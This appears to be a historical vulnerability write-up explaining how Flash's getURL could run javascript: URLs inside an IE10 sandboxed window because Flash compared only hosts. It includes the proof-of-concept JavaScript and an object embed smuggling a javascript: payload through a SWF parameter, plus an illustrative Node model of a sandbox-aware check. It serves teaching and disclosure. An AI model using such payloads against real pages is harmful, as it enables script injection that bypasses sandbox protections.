After the Win8 Release Preview re-enabled javascript: URLs in sandboxed iframes (the Win8 Consumer Preview had disabled them), I found that Flash's getURL method could reach a named sandboxed window with a javascript: URI. Flash checked only whether the domain of the target window matched the host the SWF was loaded from; it knew nothing about IE's sandbox attribute. So whenever the domains matched, Flash executed the script inside the sandboxed window and the sandbox was bypassed. This is distinct from the earlier "Sandbox Paradox" iframe technique, which did not work across window.open targets.

// On the host page: open the sandboxed document in a named window.
window.open("sandboxed.aspx", "SANDBOXED_WINDOW", "width=700,height=200");
// sandboxed.aspx sets X-Content-Security-Policy to sandbox (IE10 only honoured the sandbox directive).

// From inside Flash (geturl.swf): navigate the named window to a javascript: URL.
// Flash compares the window's domain with the SWF's host and nothing else.
getURL("javascript:alert(document.body.outerHTML)", "SANDBOXED_WINDOW"); // Sandbox bypass.

<!-- Flash object injected into the host page. allowScriptAccess=Always lets the SWF issue javascript: URLs;
     METHOD/TARGET/REDIR are the redirector SWF's own query parameters. -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="10" height="10">
    <param name="allowScriptAccess" value="Always" />
    <param name="movie" value="geturl.swf?METHOD=get&TARGET=SANDBOXED_WINDOW&REDIR=javascript:alert(document.body.outerHTML);//" />
</object>

Because Flash matched only domains, it routed the javascript: URL into the named sandboxed window and the script ran inside that window, which is exactly what the sandbox was supposed to forbid. The alert read document.body.outerHTML straight out of the sandboxed document; an attacker-controlled SWF on the same host could therefore run arbitrary script against any same-host document that relied on the sandbox for protection.
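The root cause is a same-origin decision that consults hosts only and never the target's sandbox flags. The following is an added model of that decision beside a sandbox-aware version; it is not Flash Player's code and not from the original post. The host.example URLs, the makeWindow() object and its sandboxed/allowScripts/allowSameOrigin flags are assumptions made for the example, standing in for an iframe sandbox attribute or an X-Content-Security-Policy: sandbox header. It runs under Node without a browser.

```javascript
// Model of the check Flash Player made before routing getURL() into a named
// window, next to a sandbox-aware version. Added illustration, not Flash
// Player source; URLs and the window model are constructed for the example.

// Assumed location of the attacker's SWF (constructed).
const SWF_URL = "http://host.example/geturl.swf";

// Minimal model of a named browsing context (assumed). `sandboxed` stands for
// an iframe sandbox attribute or an IE10 X-Content-Security-Policy: sandbox
// header; the allow* flags mirror the "allow-scripts" / "allow-same-origin"
// sandbox tokens.
function makeWindow(name, url, flags = {}) {
  return {
    name,
    url,
    sandboxed: Boolean(flags.sandboxed),
    allowScripts: Boolean(flags.allowScripts),
    allowSameOrigin: Boolean(flags.allowSameOrigin),
  };
}

// Scheme test, case-insensitive and tolerant of leading whitespace.
function isJavascriptUrl(navUrl) {
  return /^\s*javascript:/i.test(navUrl);
}

// Flash's check as the post describes it: does the target window's host match
// the SWF's host? The navigation URL and the sandbox state are not consulted,
// so a sandboxed document on the same host passes.
function flashStyleAllows(swfUrl, target) {
  return new URL(swfUrl).hostname === new URL(target.url).hostname;
}

// Sandbox-aware version. Two properties of sandboxed documents matter:
//  1. without allow-scripts no script may run in the document, so a
//     javascript: navigation must be refused whatever the origin;
//  2. without allow-same-origin the document has an opaque origin, so a host
//     comparison proves nothing and must fail.
function sandboxAwareAllows(swfUrl, target, navUrl) {
  if (target.sandboxed) {
    if (isJavascriptUrl(navUrl) && !target.allowScripts) return false;
    if (!target.allowSameOrigin) return false;
  }
  return flashStyleAllows(swfUrl, target);
}

// Parse the query string the PoC handed to geturl.swf via <param name="movie">.
function parseMovieParams(movieValue, baseUrl = SWF_URL) {
  const q = new URL(movieValue, baseUrl).searchParams;
  return { method: q.get("METHOD"), target: q.get("TARGET"), redir: q.get("REDIR") };
}

// Replay the post's PoC through both checks. sandboxed.aspx is on the same
// host as the SWF and sandboxed with no allow-* tokens, as in the post.
function replayPoc() {
  const movie =
    "geturl.swf?METHOD=get&TARGET=SANDBOXED_WINDOW&REDIR=javascript:alert(document.body.outerHTML);//";
  const params = parseMovieParams(movie);
  const target = makeWindow(params.target, "http://host.example/sandboxed.aspx", {
    sandboxed: true,
  });
  return {
    redir: params.redir,
    flashAllows: flashStyleAllows(SWF_URL, target), // true: the bypass
    sandboxAwareAllows: sandboxAwareAllows(SWF_URL, target, params.redir), // false
  };
}
```

flashStyleAllows() deliberately takes no navigation URL: the point is that the decision never looked at what was being navigated to, only at where. A sandboxed frame that has been granted both allow-scripts and allow-same-origin behaves like an unsandboxed same-origin frame in the sandbox-aware check, which is the correct outcome.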

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.